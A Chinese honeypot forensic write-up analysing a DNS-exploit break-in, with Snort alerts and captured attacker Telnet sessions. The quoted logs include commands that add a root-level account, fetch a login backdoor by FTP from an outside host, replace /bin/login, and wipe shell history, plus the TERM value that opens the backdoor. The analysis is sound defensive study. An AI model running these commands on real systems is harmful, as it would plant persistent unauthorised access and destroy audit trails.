ImageVerifierCode 换一换
格式:DOCX , 页数:22 ,大小:21.53KB ,
资源ID:8007944      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/8007944.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(一次被DNS攻击后的分析.docx)为本站会员(b****5)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

一次被DNS攻击后的分析.docx

1、一次被DNS攻击后的分析一次被DNS攻击后的分析 这篇文章是关于被DNS攻击后的系统分析,通过这个分析可以了解攻击者的行为,能很好的了解怎样攻击,攻击后做什么等各种行为,有助你更好的维护系统。原文作者:lance背景 此文信息由honeypot- VISION 的IDS签字。攻击行为在四月26号,snort提醒我其中的一个系统正受到一个noop攻击,信息包装载包含noops的信息,在此情况下,SNORT探测到攻击和记录了警告信息到/var/log/messages文件中(使用Apr 26 06:43:05 lisa snort6283: IDS181/nops-x86: 63.226.81.1

2、3:1351 - 172.16.1.107:53我的honeypots接受无数探测,扫描和查询,而且下面的一个警告信息使我注意到其中一个系统可能被破坏,下面的系统LOG信息指示攻击者正开始了一个连接和LOGIN了系统:Apr 26 06:44:25 victim7 PAM_pwdb12509: (login) session opened for user twin by (uid=0)Apr 26 06:44:36 victim7 PAM_pwdb12521: (su) session opened for user hantu by twin(uid=506) 从上面的情况可以看到,入侵者

3、已经获得超级用户权利和控制了整个系统,但这是怎样完成的呢,我们下面开始分析:分析 当分析一攻击的时候,最好的位置是在开始端,即攻击者是从哪里开始的,攻击者一般开始是收集系统信息,可以让他获得系统所存在的漏洞,如果你的系统被破坏,这就表明攻击者不是第一次与你的系统通信了,大多数攻击者必须通过对你系统的连接获得初始化的信息。所以我们从最开始的信息收集开始,从第一条信息可以知道攻击初于53端口,这表示在我们系统上发动了一个DNS攻击,所以我通过我的snort alerts-可能的信息探测,我们发现一DNS版本查询探测的信息:Apr 25 02:08:07 lisa snort5875: IDS277

4、/DNS-version-query: 63.226.81.13:4499 - 172.16.1.107:53Apr 25 02:08:07 lisa snort5875: IDS277/DNS-version-query: 63.226.81.13:4630 - 172.16.1.101:53 注意,这个探测日期是4月25日,我们系统被攻击是在4月26号,系统是在被探测后的一天被入侵的,所以我猜测攻击者是使用一些扫描器扫描出一些关于DNS漏洞的信息,扫描以后,攻击者查看扫描结果,获得系统漏洞信息,然后启用他们的EXPLOIT。这样我们可以得到如下结论:在4月25号被检测后,后一天被侵入,通过

5、我们的IDS警告,我们获知我们是被DNS漏洞攻击。THE EXPLOIT: 类似于大多数商业IDS系统,snort可以显示我们所有IP信息包装载数据,我们就使用这功能来分析EXPLOIT,这个EXPLOIT信息可以从snort的LOG记录获得(存储在tcpdump两进制格式)。我查询snort的LOG记录并开始分析攻击开始时候的信息包,我没有把信息限制在仅查询主机63.336.81.13,主要是因为攻击者使用三个不同系统来运行这个EXPLOIT,这个EXPLOIT的目标是在远程主机上获得ROOT SHELL,一旦攻击者获得ROOT SHELL,他们可以以ROOT身份运行所有命令,还通常会在/e

6、tc/passwd和/etc/shadow文件中增加帐号,下面的获得ROOT SHELL后执行的一些命令:cd /; uname -a; pwd; id;Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown/uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)echo twin:506:506:/home/twin:/bin/bash /etc/passwdecho twi

7、n:w3nT2H0b6AjM2: /etc/shadowecho hantu:0:0:/:/bin/bash /etc/passwdecho hantu:w3nT2H0b6AjM2: /etc/shadow 从上面可以知道,攻击者运行了uname -a 查询了系统,和PWD查询当前目录,和ID查看UID,并增加了twin和hantu两个帐号,使用了相同的密码,必须注意,twin使用了UID为506,而hantu使用了UID为0(另一方面hantu是印度尼西亚语言中的鬼魂的意思),要知道,大多数系统中不允许UID为0的帐号远程TELNET,所以起建立了一个可以远程TELNET的帐号,并建立了以后

8、可以SU到ROOT的帐号。在90秒内攻击者利用了EXPLOIT程序进入系统,并获得ROOT权利(可以通过下面的LOG记录),Apr 26 06:43:05 lisa snort6283: IDS181/nops-x86: 63.226.81.13:1351 - 172.16.1.107:53Apr 26 06:44:25 victim7 PAM_pwdb12509: (login) session opened for user twin by (uid=0)Apr 26 06:44:36 victim7 PAM_pwdb12521: (su) session opened for user

9、hantu by twin(uid=506)现在要分析其下一步将做什么?获得访问权利后的活动 比较幸运的是,TELNET是明文协议,对数据没有进行加密,这表示我们可以解开其踪迹和捕获其击键记录,而snort就做好了这些,这就是snort另一个好处,通过捕获对TELNET会话的击键记录,我们可以判断攻击者在做何工作,snort捕获了不但是STDIN(击键),而且还有STDOUT 和STDER记录,让我们来看看TELNET会话和入侵者的活动吧: 开始,我们的朋友一twin身份TELNET系统(从213.28.22.189),并获得超级用户身份-hantu,这里要记住他不能以UID为0的身份TELN

10、ET。# !# 9600,9600VT5444VT5444Red Hat Linux release 6.0 (Shedwig)Kernel 2.2.5-15 on an i586login: twinPassword: Password: hax0rNo directory /home/twin!Logging in with home = /.twinapollo /$ su hantuPassword: Password: hax0r下一步,攻击者去其他机器抓取ROOTKIT程序,如下:rootapollo /# ftp 24.112.167.35Connected to 24.112.

11、167.35.220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.Name (24.112.167.35:twin): welek331 Password required for welek.Password:password230 User welek logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp get bj.clocal: bj.c remote: bj.c200 PORT c

12、ommand successful.150 Opening BINARY mode data connection for bj.c (1010 bytes).226 Transfer complete.1010 bytes received in 0.115 secs (8.6 Kbytes/sec)ftp quit221-You have transferred 1010 bytes in 1 files.221-Total traffic for this session was 1421 bytes in 1 transfers.221-Thank you for using the

13、FTP service on linux.221 Goodbye.他FTP获得了后门程序,编译了bj.c,并安装代替了/sbin/login程序,(从下面的记录来看,攻击者使用了COPY和粘贴的工作):rootapollo /# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/oldrm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv

14、 login /bin/loginrm bj.cgcc -o login bj.cbj.c:16: unterminated string or character constantbj.c:12: possible real start of unterminated constant然后他起用了后门程序:rootapollo /# chown root:bin loginchown: login: No such file or directoryrootapollo /# chmod 4555 loginchmod: login: No such file or directoryroo

15、tapollo /# chmod u-w loginchmod: login: No such file or directoryrootapollo /# cp /bin/login /usr/bin/xstatrootapollo /# cp /bin/login /usr/bin/oldrootapollo /# rm /bin/loginrootapollo /# chmod 555 /usr/bin/xstatrootapollo /# chgrp bin /usr/bin/xstatrootapollo /# mv login /bin/loginmv: login: No suc

16、h file or directoryrootapollo /# rm bj.c后来从记录来看,攻击者并没有成功,他又一次FTP到站点再次下载了后门:rootapollo /# ftp 24.112.167.35Connected to 24.112.167.35.220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.Name (24.112.167.35:twin): rootapollo /# ftp 24.112.167.35Connected to 24.112.167.35.220

17、linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.Name (24.112.167.35:twin): welek331 Password required for welek.Password:331 Password required for welek.Password:password230 User welek logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp get bj.cqulo

18、cal: bj.c remote: bj.c200 PORT command successful.u150 Opening BINARY mode data connection for bj.c (1011 bytes).226 Transfer complete.1011 bytes received in 0.134 secs (7.3 Kbytes/sec)ftp itit221-You have transferred 1011 bytes in 1 files.221-Total traffic for this session was 1422 bytes in 1 trans

19、fers.221-Thank you for using the FTP service on linux.221 Goodbye.这是攻击者第二次尝试了编译后门,注意他还是使用cut 和 paste 命令:rootapollo /# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/oldrm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xsta

20、tmv login /bin/loginrm bj.cgcc -o login bj.cbj.c: In function owned:bj.c:16: warning: assignment makes pointer from integer without a cast我们注意到编译的后门被采用,并把合法的/bin/login移到和命名为了/usr/bin/xstat,并把编译后的bj.c代码代替了/bin/login,这个后门程序允许任何人把TERM设定为ct9111可以进行不用认证的访问:rootapollo /# chown root:bin loginrootapollo /#

21、chmod 4555 loginrootapollo /# chmod u-w loginrootapollo /# cp /bin/login /usr/bin/xstatcp: /bin/login: No such file or directoryrootapollo /# cp /bin/login /usr/bin/oldcp: /bin/login: No such file or directoryrootapollo /# rm /bin/loginrm: cannot remove /bin/login: No such file or directoryrootapoll

22、o /# chmod 555 /usr/bin/xstatrootapollo /# chgrp bin /usr/bin/xstatrootapollo /# mv login /bin/login下面的是攻击者摸去其脚印的活动,我相信他使用了脚本程序,并使用了CUT和PASTE,因为注意所有命令的执行只有一个命令提示符,并从下面的记录我们可以知道这个清理的脚本语言名字为generic ,注意它是怎样删除这些文件的:rootapollo /# rm bj.crootapollo /# rootapollo /# ps -aux | grep inetd ; ps -aux | grep po

23、rtmap ;rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ;rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ;rm /sbin/porgrep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ;rm /tmp/h ; rm /usrp portmap ; rm /sbin/portmap ; rm /

24、tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rfap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ;rm -rf /root/.babin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbash* ;rm -rf /root/.bash_history ; rm -rf /usr/sbin/named359 ? 00:00:00 inetd359 ? 00:00:00 inetdrm: cannot

25、 remove /tmp/h: No such file or directoryrm: cannot remove /usr/sbin/rpc.portmap: No such file or directoryrootapollo /# ps -aux | grep portmaprootapollo /# rootapollo /# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ;rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /

26、root/.bash_history ;rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/porgrep inetd ;ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usrp portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rfap ;rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -

27、rf .bash* ; rm -rf /root/.babin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ;rm -rf /usr/sbash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/named359 ? 00:00:00 inetdrm: cannot remove /sbin/portmap: No such file or directoryrm: cannot remove /tmp/h: No such file or directoryrm: canno

28、t remove /usr/sbin/rpc.portmap: No such file or directoryrootapollo /# rm: cannot remove /sbin/portmap: No such file or directory这里发现了一个有趣的事情,这个攻击者使用的generic清理脚本在尝试删除不存在文件的时候产生了错误,我判断攻击者看到了这些信息并尝试了手工删除这些文件,经管这些文件不存在:rm: cannot remove /tmp/h: No such file or directoryrm: cannot remove /usr/sbin/rpc.p

29、ortmap: No such file or directoryrootapollo /# rm: cannot remove /sbin/portmap: No such file or directoryrm: cannot remove /tmp/h: No such file or directoryrm: cannot remove /usr/sbin/rpc.portmap: No such file or directoryrootapollo /# exitexittwinapollo /$ exitlogout 到这里为止,他离开了系统,并安装了BJ.C后门,这个后门允许未认证的访问,只要把TERM设置为VT9111即可。后来,攻击者又多次进行了连接

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1